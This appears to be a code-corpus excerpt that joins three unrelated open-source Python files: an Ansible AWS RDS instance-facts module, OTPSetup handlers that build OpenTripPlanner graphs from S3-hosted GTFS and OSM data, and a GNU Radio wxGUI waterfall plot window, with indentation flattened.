allocated_storage:
description: Gigabytes of storage allocated to the database
returned: always
type: int
sample: 10
auto_minor_version_upgrade:
description: Whether minor version upgrades happen automatically
returned: always
type: bool
sample: true
availability_zone:
description: Availability Zone in which the database resides
returned: always
type: string
sample: us-west-2b
backup_retention_period:
description: Days for which backups are retained
returned: always
type: int
sample: 7
ca_certificate_identifier:
description: ID for the CA certificate
returned: always
type: string
sample: rds-ca-2015
copy_tags_to_snapshot:
description: Whether DB tags should be copied to the snapshot
returned: always
type: bool
sample: false
db_instance_arn:
description: ARN of the database instance
returned: always
type: string
sample: arn:aws:rds:us-west-2:111111111111:db:helloworld-rds
db_instance_class:
description: Instance class of the database instance
returned: always
type: string
sample: db.t2.small
db_instance_identifier:
description: Database instance identifier
returned: always
type: string
sample: helloworld-rds
db_instance_port:
description: Port used by the database instance
returned: always
type: int
sample: 0
db_instance_status:
description: Status of the database instance
returned: always
type: string
sample: available
db_name:
description: Name of the database
returned: always
type: string
sample: management
db_parameter_groups:
description: List of database parameter groups
returned: always
type: complex
contains:
db_parameter_group_name:
description: Name of the database parameter group
returned: always
type: string
sample: psql-pg-helloworld
parameter_apply_status:
description: Whether the parameter group has been applied
returned: always
type: string
sample: in-sync
db_security_groups:
description: List of security groups used by the database instance
returned: always
type: list
sample: []
db_subnet_group:
description: list of subnet groups
returned: always
type: complex
contains:
db_subnet_group_description:
description: Description of the DB subnet group
returned: always
type: string
sample: My database subnet group
db_subnet_group_name:
description: Name of the database subnet group
returned: always
type: string
sample: my-subnet-group
subnet_group_status:
description: Subnet group status
returned: always
type: string
sample: Complete
subnets:
description: List of subnets in the subnet group
returned: always
type: complex
contains:
subnet_availability_zone:
description: Availability zone of the subnet
returned: always
type: complex
contains:
name:
description: Name of the availability zone
returned: always
type: string
sample: us-west-2c
subnet_identifier:
description: Subnet ID
returned: always
type: string
sample: subnet-abcd1234
subnet_status:
description: Subnet status
returned: always
type: string
sample: Active
vpc_id:
description: VPC id of the subnet group
returned: always
type: string
sample: vpc-abcd1234
dbi_resource_id:
description: AWS Region-unique, immutable identifier for the DB instance
returned: always
type: string
sample: db-AAAAAAAAAAAAAAAAAAAAAAAAAA
domain_memberships:
description: List of domain memberships
returned: always
type: list
sample: []
endpoint:
description: Database endpoint
returned: always
type: complex
contains:
address:
description: Database endpoint address
returned: always
type: string
sample: helloworld-rds.ctrqpe3so1sf.us-west-2.rds.amazonaws.com
hosted_zone_id:
description: Route53 hosted zone ID
returned: always
type: string
sample: Z1PABCD0000000
port:
description: Database endpoint port
returned: always
type: int
sample: 5432
engine:
description: Database engine
returned: always
type: string
sample: postgres
engine_version:
description: Database engine version
returned: always
type: string
sample: 9.5.10
iam_database_authentication_enabled:
description: Whether database authentication through IAM is enabled
returned: always
type: bool
sample: false
instance_create_time:
description: Date and time the instance was created
returned: always
type: string
sample: '2017-10-10T04:00:07.434000+00:00'
kms_key_id:
description: KMS Key ID
returned: always
type: string
sample: arn:aws:kms:us-west-2:111111111111:key/abcd1234-0000-abcd-1111-0123456789ab
latest_restorable_time:
description: Latest time to which a database can be restored with point-in-time restore
returned: always
type: string
sample: '2018-05-17T00:03:56+00:00'
license_model:
description: License model
returned: always
type: string
sample: postgresql-license
master_username:
description: Database master username
returned: always
type: string
sample: dbadmin
monitoring_interval:
description: Interval, in seconds, between points when Enhanced Monitoring metrics are collected for the DB instance
returned: always
type: int
sample: 0
multi_az:
description: Whether Multi-AZ is on
returned: always
type: bool
sample: false
option_group_memberships:
description: List of option groups
returned: always
type: complex
contains:
option_group_name:
description: Option group name
returned: always
type: string
sample: default:postgres-9-5
status:
description: Status of option group
returned: always
type: string
sample: in-sync
pending_modified_values:
description: Modified values pending application
returned: always
type: complex
contains: {}
performance_insights_enabled:
description: Whether performance insights are enabled
returned: always
type: bool
sample: false
preferred_backup_window:
description: Preferred backup window
returned: always
type: string
sample: 04:00-05:00
preferred_maintenance_window:
description: Preferred maintenance window
returned: always
type: string
sample: mon:05:00-mon:05:30
publicly_accessible:
description: Whether the DB is publicly accessible
returned: always
type: bool
sample: false
read_replica_db_instance_identifiers:
description: List of database instance read replicas
returned: always
type: list
sample: []
storage_encrypted:
description: Whether the storage is encrypted
returned: always
type: bool
sample: true
storage_type:
description: Storage type of the Database instance
returned: always
type: string
sample: gp2
tags:
description: Tags used by the database instance
returned: always
type: complex
contains: {}
vpc_security_groups:
description: List of VPC security groups
returned: always
type: complex
contains:
status:
description: Status of the VPC security group
returned: always
type: string
sample: active
vpc_security_group_id:
description: VPC Security Group ID
returned: always
type: string
sample: sg-abcd1234
'''
from ansible.module_utils.aws.core import AnsibleAWSModule, is_boto3_error_code
from ansible.module_utils.ec2 import ansible_dict_to_boto3_filter_list, boto3_tag_list_to_ansible_dict, AWSRetry, camel_dict_to_snake_dict
try:
import botocore
except ImportError:
pass # handled by AnsibleAWSModule
def instance_facts(module, conn):
instance_name = module.params.get('db_instance_identifier')
filters = module.params.get('filters')
params = dict()
if instance_name:
params['DBInstanceIdentifier'] = instance_name
if filters:
params['Filters'] = ansible_dict_to_boto3_filter_list(filters)
paginator = conn.get_paginator('describe_db_instances')
try:
results = paginator.paginate(**params).build_full_result()['DBInstances']
except is_boto3_error_code('DBInstanceNotFound'):
results = []
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e: # pylint: disable=duplicate-except
module.fail_json_aws(e, "Couldn't get instance information")
for instance in results:
try:
instance['Tags'] = boto3_tag_list_to_ansible_dict(conn.list_tags_for_resource(ResourceName=instance['DBInstanceArn'],
aws_retry=True)['TagList'])
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
module.fail_json_aws(e, "Couldn't get tags for instance %s" % instance['DBInstanceIdentifier'])
return dict(changed=False, instances=[camel_dict_to_snake_dict(instance, ignore_list=['Tags']) for instance in results])
def main():
argument_spec = dict(
db_instance_identifier=dict(aliases=['id']),
filters=dict(type='dict')
)
module = AnsibleAWSModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
conn = module.client('rds', retry_decorator=AWSRetry.jittered_backoff(retries=10))
module.exit_json(**instance_facts(module, conn))
if __name__ == '__main__':
main()
| gpl-3.0 |
Genovo/OTPSetup | otpsetup/graph_builder/handlers.py | 2 | 18125 | #!/usr/bin/python
from boto import connect_s3, connect_ec2
from boto.s3.key import Key
from kombu import Exchange
#from otpsetup.client.models import GtfsFile
from otpsetup import settings
from shutil import copyfileobj
from datetime import datetime
import os, socket, traceback, subprocess, builder, json, uuid
#import transformer
exchange = Exchange("amq.direct", type="direct", durable=True)
# helper functions
def download_jar(otp_version):
print "downloading jar for %s" % otp_version
connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
bucket = connection.get_bucket('otpsetup-resources')
key = Key(bucket)
key.key = '%s/graph-builder.jar' % otp_version
local_file = '/var/otp/resources/otpgb/graph-builder.jar'
key.get_contents_to_filename(local_file)
def get_req_name(request_id):
return "req%s_%s" % (request_id, datetime.now().strftime("%F-%T"))
def init_directory(req_name):
directory = os.path.join("/mnt", req_name)
os.makedirs(directory)
return directory
def get_otp_version():
pompropsfile = 'META-INF/maven/org.opentripplanner/opentripplanner-graph-builder/pom.properties'
subprocess.call(['unzip', '-o', os.path.join(settings.GRAPH_BUILDER_RESOURCE_DIR, 'otpgb/graph-builder.jar'), pompropsfile, '-d', '/mnt'])
pomprops = open(os.path.join('/mnt', pompropsfile), 'r')
version = 'n/a'
for line in pomprops:
if line[:8] == 'version=':
version = line[8:].rstrip()
break
return version
def gtfs_bucket(cache = {}):
if not 'bucket' in cache:
connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
bucket = connection.get_bucket(settings.S3_BUCKET)
cache['bucket'] = bucket
else:
return cache['bucket']
return bucket
def managed_gtfs_bucket(cache = {}):
if not 'bucket' in cache:
connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
bucket = connection.get_bucket('gtfs-test')
cache['bucket'] = bucket
else:
return cache['bucket']
return bucket
def graph_bucket(cache = {}):
if not 'bucket' in cache:
connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
bucket = connection.get_bucket(settings.GRAPH_S3_BUCKET)
cache['bucket'] = bucket
else:
return cache['bucket']
return bucket
def osm_bucket(cache = {}):
if not 'bucket' in cache:
connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
bucket = connection.get_bucket('managed-osm')
cache['bucket'] = bucket
else:
return cache['bucket']
return bucket
def write_output_to_s3(key_text, output):
outputfilename = '/mnt/gb_output'
outputfile = open(outputfilename, 'w')
outputfile.write(output)
outputfile.close()
key = Key(graph_bucket())
key.key = key_text
key.set_contents_from_filename(outputfilename)
def download_managed_gtfs(directory, feeds):
bucket = managed_gtfs_bucket()
print "feeds:"
os.makedirs(os.path.join(directory, 'gtfs'))
for feed in feeds:
print " - %s" % feed['key']
key = Key(bucket)
key.key = feed['key']
basename = os.path.basename(feed['key'].split('/')[-1])
path = os.path.join(directory, 'gtfs', "%s.zip" % basename)
key.get_contents_to_filename(path)
print " - wrote %s" % path
# handler functions
# legacy support to create "preview" deployment. look into merging w/ "managed" deployment workflow below
def create_instance(conn, body):
try:
req_name = get_req_name(body['request_id']);
directory = init_directory(req_name);
# extract gtfs files
os.makedirs(os.path.join(directory, 'gtfs'))
files = body['files']
extra_props_list = body['extra_properties']
extra_props_dict = { }
out = []
i = 0
for s3_id in files:
if s3_id is None:
continue
print "id: " + s3_id
bucket = gtfs_bucket()
key = Key(bucket)
key.key = s3_id
basename = os.path.basename(s3_id)
path = os.path.join(directory, 'gtfs', basename)
key.get_contents_to_filename(path)
extra_props_dict[basename] = extra_props_list[i]
i += 1
# prepare and run graph builder
builder.generate_osm_extract(directory)
builder.generate_graph_config(directory, body['fare_factory'], extra_props_dict)
gbresults = builder.run_graph_builder(directory)
print "finished gb: %s" % gbresults['success']
msgparams = { }
msgparams['request_id'] = body['request_id']
msgparams['success'] = gbresults['success']
bucket = graph_bucket()
if gbresults['success']:
key = Key(bucket)
key.key = "uploads/%s/Graph_%s.obj" % (body['request_id'], datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S"))
graph_file = os.path.join(directory,'Graph.obj')
key.set_contents_from_filename(graph_file)
key.set_acl('public-read')
msgparams['key'] = key.key
subprocess.call(['rm', graph_file])
msgparams['otp_version'] = get_otp_version()
# create data tarball and upload to s3
tarball = os.path.join('/mnt', ('%s.tar.gz' % req_name))
subprocess.call(['tar', 'czf', tarball, directory])
key = Key(bucket)
data_key = "data/%s.tar.gz" % req_name
key.key = data_key
key.set_contents_from_filename(tarball)
msgparams['data_key'] = data_key
# publish graph_done message
publisher = conn.Producer(routing_key="graph_done", exchange=exchange)
publisher.publish(msgparams)
print 'published graph_done'
# write gb output to file to s3
write_output_to_s3("output/%s_output.txt" % req_name, gbresults['output'])
except:
now = datetime.now()
errfile = "/var/otp/gb_err_%s_%s" % (body['request_id'], now.strftime("%F-%T"))
traceback.print_exc(file=open(errfile,"a"))
def process_gtfs(conn, body):
try:
print 'process_gtfs'
#print body['config']
#config = json.loads(body['config'])
directory = "/mnt/gtfs%s" % body['id']
bucket = managed_gtfs_bucket()
print "feeds:"
i = 0
agency_groups = { }
os.makedirs(os.path.join(directory, 'gtfs'))
for feed in body['feeds']:
feedId = feed['feedId']
print " - %s" % feedId
if 'defaultAgencyId' in feed:
agencyId = feed['defaultAgencyId']
if agencyId in agency_groups:
agency_groups[agencyId].append(feed)
else:
agency_groups[agencyId] = [ feed ]
else:
agencyId = "agency%s" % i
i = i + 1
agency_groups[agencyId] = [ feedId ]
print agency_groups
agency_keys = { }
agency_original_keys = { }
for agencyId in agency_groups:
print "%s: %s" % (agencyId, len(agency_groups[agencyId]))
agencyDir = os.path.join(directory, agencyId)
keyList = []
for feed in agency_groups[agencyId]:
keyList.append(feed['feedId'])
print "keyList: %s" % keyList
agency_original_keys[agencyId] = ",".join(keyList)
if len(agency_groups[agencyId]) > 1: # multiple feeds for agency -- shorten & merge required
# download & shorten feeds
os.makedirs(agencyDir)
shortened_paths = []
for feed in agency_groups[agencyId]:
feedId = feed['feedId']
print "downloading %s" % feedId
key = Key(bucket)
key.key = feedId
basename = os.path.basename(feedId)
path = os.path.join(agencyDir, "%s.zip" % basename)
key.get_contents_to_filename(path)
# shorten
print " shortening"
shortened_path = os.path.join(agencyDir, "%s_shortened.zip" % basename)
shorten_date = feed['expireOn'].replace("-","")
subprocess.call(['python', '/var/otp/resources/process_gtfs/shortenGtfsFeed.py', shorten_date, path, shortened_path])
shortened_paths.append(shortened_path)
print " shortened"
# merge
mergejarpath = "/var/otp/resources/process_gtfs/merger.jar"
#merge_cmd = ['java', '-Xms15G', '-Xmx15G', '-jar', mergejarpath, '--file=agency.txt', '--fuzzyDuplicates', '--file=routes.txt', '--fuzzyDuplicates', '--file=shapes.txt', '--fuzzyDuplicates', '--file=fare_attributes.txt', '--fuzzyDuplicates', '--file=fare_rules.txt', '--fuzzyDuplicates', '--file=transfers.txt', '--fuzzyDuplicates', '--file=calendar.txt', '--renameDuplicates', '--file=trips.txt', '--renameDuplicates']
merge_cmd = ['java', '-Xms15G', '-Xmx15G', '-jar', mergejarpath, '--file=agency.txt', '--fuzzyDuplicates', '--file=stops.txt', '--fuzzyDuplicates', '--file=routes.txt', '--fuzzyDuplicates', '--file=shapes.txt', '--fuzzyDuplicates', '--file=fare_attributes.txt', '--fuzzyDuplicates', '--file=fare_rules.txt', '--fuzzyDuplicates', '--file=transfers.txt', '--fuzzyDuplicates', '--file=calendar.txt', '--duplicateDetection=IDENTITY', '--renameDuplicates', '--file=trips.txt', '--duplicateDetection=IDENTITY', '--renameDuplicates']
merge_cmd.extend(shortened_paths)
merged_path = os.path.join(agencyDir, "merged.zip")
merge_cmd.append(merged_path)
print "merging"
subprocess.call(merge_cmd)
print "merged"
to_transform = merged_path
else: # single feed for agency ("standalone" feed) -- shorten only
os.makedirs(agencyDir)
feed = agency_groups[agencyId][0]
print "process standalone: %s" % feed['feedId']
key = Key(bucket)
key.key = feed['feedId']
basename = os.path.basename(feedId)
path = os.path.join(agencyDir, "%s.zip" % basename)
key.get_contents_to_filename(path)
# shorten
print " shortening"
shortened_path = os.path.join(agencyDir, "%s_shortened.zip" % basename)
shorten_date = feed['expireOn'].replace("-","")
subprocess.call(['python', '/var/otp/resources/process_gtfs/shortenGtfsFeed.py', shorten_date, path, shortened_path])
print " shortened"
to_transform = shortened_path
# transform
transformed_path = os.path.join(agencyDir, "transformed.zip")
transformjarpath = "/var/otp/resources/process_gtfs/transformer.jar"
transform_json = '{"op":"transform","class":"org.onebusaway.gtfs_transformer.updates.CalendarSimplicationStrategy"}'
transform_cmd = ['java', '-Xms15G', '-Xmx15G', '-jar', transformjarpath, '--transform=json:%s' % transform_json, to_transform, transformed_path ]
print "transforming"
subprocess.call(transform_cmd)
print "transformed"
# upload to s3
print "uploading to s3"
s3_key = "processed/%s" % uuid.uuid1()
key = Key(bucket)
key.key = s3_key
key.set_contents_from_filename(transformed_path)
# add key to list
agency_keys[agencyId] = s3_key
#else:
#
# # add standalone feed to list
# agency_keys[agencyId] = agency_groups[agencyId][0]
print agency_keys
# publish process_gtfs_done message
publisher = conn.Producer(routing_key="process_gtfs_done", exchange=exchange)
publisher.publish({ 'id' : body['id'], 'key_map' : agency_keys, 'original_keys_map' : agency_original_keys })
print "published p_g_d msg"
except:
now = datetime.now()
errfile = "/var/otp/gb_err_%s_%s" % (body['id'], now.strftime("%F-%T"))
traceback.print_exc(file=open(errfile,"a"))
traceback.print_exc()
def build_managed(conn, body):
try:
print "build_managed"
print "osm_key=%s" % body['osm_key']
feeds = body['feeds']
if body['osm_key'] is None or body['osm_key'] == "":
print "no osm key"
publisher = conn.Producer(routing_key="build_managed_osm", exchange=exchange)
publisher.publish({ 'id' : body['id'], 'feeds' : feeds, 'trigger_rebuild' : True, 'otp_version' : body['otp_version'] })
return
print "key exists, building"
#config = json.loads(body['config'])
# download jar for specified OTP version
download_jar(body['otp_version'])
# set up working directory
req_name = "managed_%s" % get_req_name(body['id']);
directory = init_directory(req_name);
download_managed_gtfs(directory, feeds)
# download osm extract
bucket = osm_bucket()
key = Key(bucket)
key.key = body['osm_key']
path = os.path.join(directory, 'extract.osm')
key.get_contents_to_filename(path)
# run graph builder
builder.generate_graph_config_managed(directory, feeds)
gbresults = builder.run_graph_builder(directory)
graph_key = None
timestamp = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S")
# upload graph to S3
if gbresults['success']:
key = Key(graph_bucket())
graph_key = "managed/%s/Graph_%s.obj" % (str(body['id']).zfill(6), timestamp)
key.key = graph_key
graph_file = os.path.join(directory,'Graph.obj')
key.set_contents_from_filename(graph_file)
# write gb output to file to s3
output_key = "managed/%s/output_%s.txt" % (str(body['id']).zfill(6), timestamp)
write_output_to_s3(output_key, gbresults['output'])
# publish managed_graph_done
publisher = conn.Producer(routing_key="managed_graph_done", exchange=exchange)
publisher.publish({ 'id' : body['id'], 'success' : gbresults['success'], 'graph_key' : graph_key, 'output_key' : output_key, 'otp_version' : get_otp_version() })
except:
now = datetime.now()
errfile = "/var/otp/gb_err_%s_%s" % (body['id'], now.strftime("%F-%T"))
traceback.print_exc(file=open(errfile,"a"))
traceback.print_exc()
def build_managed_osm(conn, body):
try:
print "build_managed_osm"
req_name = "managed_%s" % get_req_name(body['id']);
directory = init_directory(req_name);
feeds = body['feeds']
download_managed_gtfs(directory, feeds)
builder.generate_osm_extract(directory)
key = Key(osm_bucket())
osm_key = "%s.osm" % body['id']
key.key = osm_key
key.set_contents_from_filename(os.path.join(directory, 'extract.osm'))
print 'uploaded osm'
publisher = conn.Producer(routing_key="osm_extract_done", exchange=exchange)
publisher.publish({ 'id' : body['id'], 'osm_key' : osm_key })
print 'published extract_osm_done'
if 'trigger_rebuild' in body and body['trigger_rebuild'] is True:
publisher = conn.Producer(routing_key="build_managed", exchange=exchange)
publisher.publish({ 'id' : body['id'], 'osm_key' : osm_key, 'feeds' : feeds, 'otp_version' : body['otp_version'] })
except:
now = datetime.now()
errfile = "/var/otp/gb_err_%s_%s" % (body['id'], now.strftime("%F-%T"))
traceback.print_exc(file=open(errfile,"a"))
traceback.print_exc()
def rebuild_graph(conn, body):
try:
req_name = body['data_key'][5:][:-7]
directory = os.path.join('/mnt', req_name)
# download and extract data tarball
bucket = graph_bucket()
key = Key(bucket)
key.key = body['data_key']
tarball = '/mnt/data.tar.gz'
key.get_contents_to_filename(tarball)
subprocess.call(['tar', 'xvf', tarball, '-C', '/'])
# run graph builder
gbresults = builder.run_graph_builder(directory)
msgparams = { }
msgparams['request_id'] = body['request_id']
msgparams['success'] = gbresults['success']
if gbresults['success']:
#upload graph to s3
key = Key(bucket)
key.key = "uploads/%s/Graph_%s.obj" % (body['request_id'], datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S"))
graph_file = os.path.join(directory,'Graph.obj')
key.set_contents_from_filename(graph_file)
key.set_acl('public-read')
msgparams['key'] = key.key
subprocess.call(['rm', graph_file])
msgparams['otp_version'] = get_otp_version()
publisher = conn.Producer(routing_key="rebuild_graph_done", exchange=exchange)
publisher.publish(msgparams)
print 'published rebuild_graph_done'
# write gb output to file to s3
write_output_to_s3(req_name, gbresults['output'])
except:
now = datetime.now()
errfile = "/var/otp/gb_err_%s_%s" % (body['request_id'], now.strftime("%F-%T"))
traceback.print_exc(file=open(errfile,"a"))
| gpl-3.0 |
scalable-networks/gnuradio-3.7.2.1 | gr-wxgui/python/wxgui/waterfall_window.py | 11 | 10674 | #
# Copyright 2008 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1`301, USA.
#
##################################################
# Imports
##################################################
import plotter
import common
import wx
import numpy
import math
import pubsub
from constants import *
from gnuradio import gr #for gr.prefs
import forms
##################################################
# Constants
##################################################
SLIDER_STEPS = 100
AVG_ALPHA_MIN_EXP, AVG_ALPHA_MAX_EXP = -3, 0
DEFAULT_FRAME_RATE = gr.prefs().get_long('wxgui', 'waterfall_rate', 30)
DEFAULT_COLOR_MODE = gr.prefs().get_string('wxgui', 'waterfall_color', 'rgb1')
DEFAULT_WIN_SIZE = (600, 300)
DIV_LEVELS = (1, 2, 5, 10, 20)
MIN_DYNAMIC_RANGE, MAX_DYNAMIC_RANGE = 10, 200
DYNAMIC_RANGE_STEP = 10.
COLOR_MODES = (
('RGB1', 'rgb1'),
('RGB2', 'rgb2'),
('RGB3', 'rgb3'),
('Gray', 'gray'),
)
##################################################
# Waterfall window control panel
##################################################
class control_panel(wx.Panel):
"""
A control panel with wx widgits to control the plotter and fft block chain.
"""
def __init__(self, parent):
"""
Create a new control panel.
Args:
parent: the wx parent window
"""
self.parent = parent
wx.Panel.__init__(self, parent, style=wx.SUNKEN_BORDER)
parent[SHOW_CONTROL_PANEL_KEY] = True
parent.subscribe(SHOW_CONTROL_PANEL_KEY, self.Show)
control_box = wx.BoxSizer(wx.VERTICAL)
control_box.AddStretchSpacer()
options_box = forms.static_box_sizer(
parent=self, sizer=control_box, label='Options',
bold=True, orient=wx.VERTICAL,
)
#average
forms.check_box(
sizer=options_box, parent=self, label='Average',
ps=parent, key=AVERAGE_KEY,
)
avg_alpha_text = forms.static_text(
sizer=options_box, parent=self, label='Avg Alpha',
converter=forms.float_converter(lambda x: '%.4f'%x),
ps=parent, key=AVG_ALPHA_KEY, width=50,
)
avg_alpha_slider = forms.log_slider(
sizer=options_box, parent=self,
min_exp=AVG_ALPHA_MIN_EXP,
max_exp=AVG_ALPHA_MAX_EXP,
num_steps=SLIDER_STEPS,
ps=parent, key=AVG_ALPHA_KEY,
)
for widget in (avg_alpha_text, avg_alpha_slider):
parent.subscribe(AVERAGE_KEY, widget.Enable)
widget.Enable(parent[AVERAGE_KEY])
#begin axes box
control_box.AddStretchSpacer()
axes_box = forms.static_box_sizer(
parent=self, sizer=control_box, label='Axes Options',
bold=True, orient=wx.VERTICAL,
)
#num lines buttons
forms.incr_decr_buttons(
parent=self, sizer=axes_box, label='Time Scale',
on_incr=self._on_incr_time_scale, on_decr=self._on_decr_time_scale,
)
#dyanmic range buttons
forms.incr_decr_buttons(
parent=self, sizer=axes_box, label='Dyn Range',
on_incr=self._on_incr_dynamic_range, on_decr=self._on_decr_dynamic_range,
)
#ref lvl buttons
forms.incr_decr_buttons(
parent=self, sizer=axes_box, label='Ref Level',
on_incr=self._on_incr_ref_level, on_decr=self._on_decr_ref_level,
)
#color mode
forms.drop_down(
parent=self, sizer=axes_box, width=100,
ps=parent, key=COLOR_MODE_KEY, label='Color',
choices=map(lambda x: x[1], COLOR_MODES),
labels=map(lambda x: x[0], COLOR_MODES),
)
#autoscale
forms.single_button(
parent=self, sizer=axes_box, label='Autoscale',
callback=self.parent.autoscale,
)
#clear
control_box.AddStretchSpacer()
forms.single_button(
parent=self, sizer=control_box, label='Clear',
callback=self._on_clear_button,
)
#run/stop
forms.toggle_button(
sizer=control_box, parent=self,
true_label='Stop', false_label='Run',
ps=parent, key=RUNNING_KEY,
)
#set sizer
self.SetSizerAndFit(control_box)
##################################################
# Event handlers
##################################################
def _on_clear_button(self, event):
self.parent[NUM_LINES_KEY] = self.parent[NUM_LINES_KEY]
def _on_incr_dynamic_range(self, event):
self.parent[DYNAMIC_RANGE_KEY] = min(MAX_DYNAMIC_RANGE, common.get_clean_incr(self.parent[DYNAMIC_RANGE_KEY]))
def _on_decr_dynamic_range(self, event):
self.parent[DYNAMIC_RANGE_KEY] = max(MIN_DYNAMIC_RANGE, common.get_clean_decr(self.parent[DYNAMIC_RANGE_KEY]))
def _on_incr_ref_level(self, event):
self.parent[REF_LEVEL_KEY] = self.parent[REF_LEVEL_KEY] + self.parent[DYNAMIC_RANGE_KEY]/DYNAMIC_RANGE_STEP
def _on_decr_ref_level(self, event):
self.parent[REF_LEVEL_KEY] = self.parent[REF_LEVEL_KEY] - self.parent[DYNAMIC_RANGE_KEY]/DYNAMIC_RANGE_STEP
def _on_incr_time_scale(self, event):
old_rate = self.parent[FRAME_RATE_KEY]
self.parent[FRAME_RATE_KEY] *= 0.75
if self.parent[FRAME_RATE_KEY] < 1.0:
self.parent[FRAME_RATE_KEY] = 1.0
if self.parent[FRAME_RATE_KEY] == old_rate:
self.parent[DECIMATION_KEY] += 1
def _on_decr_time_scale(self, event):
old_rate = self.parent[FRAME_RATE_KEY]
self.parent[FRAME_RATE_KEY] *= 1.25
if self.parent[FRAME_RATE_KEY] == old_rate:
self.parent[DECIMATION_KEY] -= 1
##################################################
# Waterfall window with plotter and control panel
##################################################
class waterfall_window(wx.Panel, pubsub.pubsub):
def __init__(
self,
parent,
controller,
size,
title,
real,
fft_size,
num_lines,
decimation_key,
baseband_freq,
sample_rate_key,
frame_rate_key,
dynamic_range,
ref_level,
average_key,
avg_alpha_key,
msg_key,
):
pubsub.pubsub.__init__(self)
#setup
self.samples = list()
self.real = real
self.fft_size = fft_size
#proxy the keys
self.proxy(MSG_KEY, controller, msg_key)
self.proxy(DECIMATION_KEY, controller, decimation_key)
self.proxy(FRAME_RATE_KEY, controller, frame_rate_key)
self.proxy(AVERAGE_KEY, controller, average_key)
self.proxy(AVG_ALPHA_KEY, controller, avg_alpha_key)
self.proxy(SAMPLE_RATE_KEY, controller, sample_rate_key)
#init panel and plot
wx.Panel.__init__(self, parent, style=wx.SIMPLE_BORDER)
self.plotter = plotter.waterfall_plotter(self)
self.plotter.SetSize(wx.Size(*size))
self.plotter.SetSizeHints(*size)
self.plotter.set_title(title)
self.plotter.enable_point_label(True)
self.plotter.enable_grid_lines(False)
#plotter listeners
self.subscribe(COLOR_MODE_KEY, self.plotter.set_color_mode)
self.subscribe(NUM_LINES_KEY, self.plotter.set_num_lines)
#initialize values
self[DYNAMIC_RANGE_KEY] = dynamic_range
self[NUM_LINES_KEY] = num_lines
self[Y_DIVS_KEY] = 8
self[X_DIVS_KEY] = 8 #approximate
self[REF_LEVEL_KEY] = ref_level
self[BASEBAND_FREQ_KEY] = baseband_freq
self[COLOR_MODE_KEY] = COLOR_MODES[0][1]
self[COLOR_MODE_KEY] = DEFAULT_COLOR_MODE
self[RUNNING_KEY] = True
#setup the box with plot and controls
self.control_panel = control_panel(self)
main_box = wx.BoxSizer(wx.HORIZONTAL)
main_box.Add(self.plotter, 1, wx.EXPAND)
main_box.Add(self.control_panel, 0, wx.EXPAND)
self.SetSizerAndFit(main_box)
#register events
self.subscribe(MSG_KEY, self.handle_msg)
for key in (
DECIMATION_KEY, SAMPLE_RATE_KEY, FRAME_RATE_KEY,
BASEBAND_FREQ_KEY, X_DIVS_KEY, Y_DIVS_KEY, NUM_LINES_KEY,
): self.subscribe(key, self.update_grid)
#initial update
self.update_grid()
def set_callback(self,callb):
self.plotter.set_callback(callb)
def autoscale(self, *args):
"""
Autoscale the waterfall plot to the last frame.
Set the dynamic range and reference level.
Does not affect the current data in the waterfall.
"""
if not len(self.samples): return
min_level, max_level = common.get_min_max_fft(self.samples)
#set the range and level
self[DYNAMIC_RANGE_KEY] = common.get_clean_num(max_level - min_level)
self[REF_LEVEL_KEY] = DYNAMIC_RANGE_STEP*round(.5+max_level/DYNAMIC_RANGE_STEP)
def handle_msg(self, msg):
"""
Handle the message from the fft sink message queue.
If complex, reorder the fft samples so the negative bins come first.
If real, keep take only the positive bins.
Send the data to the plotter.
Args:
msg: the fft array as a character array
"""
if not self[RUNNING_KEY]: return
#convert to floating point numbers
self.samples = samples = numpy.fromstring(msg, numpy.float32)[:self.fft_size] #only take first frame
num_samps = len(samples)
#reorder fft
if self.real: samples = samples[:(num_samps+1)/2]
else: samples = numpy.concatenate((samples[num_samps/2+1:], samples[:(num_samps+1)/2]))
#plot the fft
self.plotter.set_samples(
samples=samples,
minimum=self[REF_LEVEL_KEY] - self[DYNAMIC_RANGE_KEY],
maximum=self[REF_LEVEL_KEY],
)
#update the plotter
self.plotter.update()
def update_grid(self, *args):
"""
Update the plotter grid.
This update method is dependent on the variables below.
Determine the x and y axis grid parameters.
The x axis depends on sample rate, baseband freq, and x divs.
The y axis depends on y per div, y divs, and ref level.
"""
#grid parameters
sample_rate = self[SAMPLE_RATE_KEY]
frame_rate = self[FRAME_RATE_KEY]
if frame_rate < 1.0 :
frame_rate = 1.0
baseband_freq = self[BASEBAND_FREQ_KEY]
num_lines = self[NUM_LINES_KEY]
y_divs = self[Y_DIVS_KEY]
x_divs = self[X_DIVS_KEY]
#determine best fitting x_per_div
if self.real: x_width = sample_rate/2.0
else: x_width = sample_rate/1.0
x_per_div = common.get_clean_num(x_width/x_divs)
#update the x grid
if self.real:
self.plotter.set_x_grid(
baseband_freq,
baseband_freq + sample_rate/2.0,
x_per_div, True,
)
else:
self.plotter.set_x_grid(
baseband_freq - sample_rate/2.0,
baseband_freq + sample_rate/2.0,
x_per_div, True,
)
#update x units
self.plotter.set_x_label('Frequency', 'Hz')
#update y grid
duration = float(num_lines)/frame_rate
y_per_div = common.get_clean_num(duration/y_divs)
self.plotter.set_y_grid(0, duration, y_per_div, True)
#update y units
self.plotter.set_y_label('Time', 's')
#update plotter
self.plotter.update()
| gpl-3.0 |
